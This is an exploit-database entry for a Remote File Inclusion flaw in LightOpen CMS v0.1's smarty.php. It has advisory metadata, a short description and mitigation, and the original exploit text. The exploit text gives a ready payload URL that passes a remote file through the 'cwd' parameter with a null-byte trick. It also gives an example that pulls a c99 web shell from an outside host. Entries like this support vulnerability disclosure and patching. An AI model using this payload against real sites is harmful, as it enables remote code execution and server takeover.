header-logo
Suggest Exploit
vendor:
LightOpen CMS
by:
Zer0 Thunder
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: LightOpen CMS
Affected Version From: v0.1
Affected Version To: v0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:lightopencms:lightopencms:0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp2
2010

LightOpen CMS Remote File Inclusion (smarty.php)

LightOpen CMS is vulnerable to a Remote File Inclusion vulnerability due to a lack of proper sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the 'cwd' parameter of the 'smarty.php' script. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent Remote File Inclusion attacks. All user-supplied input should be validated and filtered before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: LightOpen CMS Remote File Inclusion (smarty.php) 
# Date: 2010-01-05
# Author: Zer0 Thunder
# Software Link: http://sourceforge.net/projects/lightopencms/
# Version: v0.1
# Tested on: Windows XP sp2 [Wamp] 
# CVE : 
# Code :

Exploit :
http://site.com/path/smarty.php?cwd=[shell.txt]?%00


Example : 
http://localhost/locms/smarty.php?cwd=http://www.cfsm.cn/c99.txt?%00

########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
########################################